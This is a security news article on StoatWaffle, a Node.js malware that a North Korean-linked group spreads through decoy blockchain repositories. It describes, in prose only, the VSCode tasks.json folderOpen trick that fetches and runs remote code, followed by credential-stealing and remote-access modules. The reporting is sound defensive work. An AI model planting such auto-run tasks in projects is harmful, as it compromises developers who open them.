New “StoatWaffle” Malware Emerges in North Korean “Contagious Interview” Campaign

A new modular malware threat has been identified in the wild, signaling a shift in tactics for North Korean-linked threat actors. Security researchers at NTT Security Japan have uncovered StoatWaffle, a Node.js-based malware currently being deployed by WaterPlum Team 8 (also known as the Moralis or Modilus family).

Historically, this group has been associated with the “Contagious Interview” campaign—a social engineering scheme targeting developers—where they previously relied on a malware known as OtterCookie. However, as of December 2025, the group has integrated StoatWaffle into their arsenal to enhance their data-theft capabilities.

The attack begins not with a traditional executable, but with a “trap” set within a development environment. Team 8 uses blockchain-related projects as decoys to lure unsuspecting victims.

“This malicious repository contains .vscode directory that contains tasks.json file,” the analysis explains.

If a developer opens and trusts this repository in Visual Studio Code (VSCode), the tasks.json file automatically triggers a malicious sequence.The technical trick lies in the runOn key within the runOptions of the JSON file. When set to folderOpen, the designated malicious task executes the moment the directory is accessed.

The infection process is a highly orchestrated, multi-stage “downloader” sequence designed to bypass initial scrutiny:

1. Initial Bootstrap: The tasks.json downloads data from a Vercel-hosted web app, which is then executed by cmd.exe.
2. Environment Setup: A batch file named vscode-bootstrap.cmd checks for Node.js. If it’s missing, the script actually downloads and installs the official version to ensure the malware can run.
3. StoatWaffle Launch: The script then fetches env.npl, which serves as the “initial downloader of StoatWaffle”.

StoatWaffle is built for modularity, allowing the attackers to push different functionalities as needed.

• The Stealer Module: This component is designed for maximum credential harvest. “Stealer module thefts credentials stored on Web browsers and designated browser extension data and uploads them to C2 server”. It specifically targets Chromium and Firefox extensions and can even steal the Keychain database on macOS.
• The RAT Module: The Remote Access Trojan (RAT) module provides the attackers with persistent control, regularly polling the Command and Control (C2) server for new instructions to execute on the victim’s machine.

One of the most interesting features of StoatWaffle is its ability to recognize and exploit the Windows Subsystem for Linux (WSL). If the malware detects it is running in a WSL environment, it automatically converts Windows user profile paths to Linux paths using wslpath. As the researchers noted, “This allows an attacker to access Windows data from Node.js on WSL”.

The emergence of StoatWaffle proves that WaterPlum is “continuously developing new malware and updating existing ones”. For developers, this serves as a stark reminder that even a simple git clone or opening a project folder can lead to a full system compromise.